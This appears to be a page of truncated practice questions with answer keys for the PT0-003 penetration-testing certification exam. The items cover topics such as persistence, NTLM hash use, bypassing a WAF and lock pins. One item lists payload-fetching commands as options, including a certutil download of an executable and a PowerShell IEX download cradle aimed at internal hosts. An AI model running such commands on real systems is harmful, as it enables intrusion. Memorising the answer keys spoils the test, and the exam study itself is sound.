PT0-003 exam

A penetration tester is compiling the final report for a recently completed engagement. A junior QA team member wants to know where they can find details on the impact, overall security findings, and high-level statements. Which of the following sections of the report would most likely contain this information?A ....

During a security assessment for an internal corporate network, a penetration tester wants to gain unauthorized access to internal resources by executing an attack that uses software to disguise itself as legitimate software. Which of the following host-based attacks should the tester use?A . On-pathB . Logic bombC . RootkitD...

During a penetration testing engagement, a tester targets the internet-facing services used by the client. Which of the following describes the type of assessment that should be considered in this scope of work?A . SegmentationB . MobileC . ExternalD . WebView AnswerAnswer: C Explanation: An external assessment focuses on testing...

A penetration tester cannot find information on the target company's systems using common OSINT methods. The tester's attempts to do reconnaissance against internet-facing resources have been blocked by the company's WAF. Which of the following is the best way to avoid the WAF and gather information about the target company's...

During an assessment, a penetration tester obtains an NTLM hash from a legacy Windows machine. Which of the following tools should the penetration tester use to continue the attack?A . ResponderB . HydraC . BloodHoundD . CrackMapExecView AnswerAnswer: D Explanation: When a penetration tester obtains an NTLM hash from a...

As part of an engagement, a penetration tester wants to maintain access to a compromised system after rebooting. Which of the following techniques would be best for the tester to use?A . Establishing a reverse shellB . Executing a process injection attackC . Creating a scheduled taskD . Performing a...

Which of the following elements in a lock should be aligned to a specific level to allow the key cylinder to turn?A . LatchesB . PinsC . ShackleD . PlugView AnswerAnswer: B Explanation: In a pin tumbler lock, the key interacts with a series of pins within the lock cylinder....

A penetration tester is evaluating a SCADA system. The tester receives local access to a workstation that is running a single application. While navigating through the application, the tester opens a terminal window and gains access to the underlying operating system. Which of the following attacks is the tester performing?A...

A penetration tester gains initial access to an endpoint and needs to execute a payload to obtain additional access. Which of the following commands should the penetration tester use?A . powershell.exe impo C:toolsfoo.ps1B . certutil.exe -f https://192.168.0.1/foo.exe bad.exeC . powershell.exe -noni -encode IEX.Downloadstring("http://172.16.0.1/")D . rundll32.exe c:pathfoo.dll,functNameView AnswerAnswer: B Explanation: To...

A tester completed a report for a new client. Prior to sharing the report with the client, which of the following should the tester request to complete a review?A . A generative AI assistantB . The customer's designated contactC . A cybersecurity industry peerD . A team memberView AnswerAnswer: D...